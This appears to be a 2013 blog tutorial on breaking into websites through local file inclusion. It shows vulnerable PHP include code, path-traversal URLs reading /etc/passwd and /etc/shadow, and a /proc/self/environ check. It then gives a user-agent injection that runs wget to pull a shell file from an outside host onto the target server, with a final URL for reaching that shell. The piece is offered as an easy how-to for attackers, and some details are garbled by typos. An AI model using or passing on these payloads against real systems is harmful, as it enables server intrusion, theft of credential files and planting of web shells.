Tuesday, January 8, 2013

Hacking Websites via LFI (Simple, Short and easy)


 1. Introduction
 2. /proc/self/environ
 3. PHP injection
 4. Accessing the shell

1. Introduction

Remember LFI? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.

Here is the example of a code that is vulnerable to LFI:

<?php
// LFI Vulnerable Code
$redirect = $_GET[redirect];
include($redirect);
?>

It is vulnerable because $redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.

Here is a example of LFI on Unix (very old):
http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)

2. proc/self/environ

To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/sef/environ

If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... That means it is vulnerable.

If you get only a blank page, it isn't vulnerable.

3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.

Our command will be executed.

4. Accessing the shell

To check if the command got executed, we will enter something like this:
http://www.google.ca/gonullyourself.php

If our shell is there, the command was successfully executed.

Easy :) Isn't it?

0 comments:

Post a Comment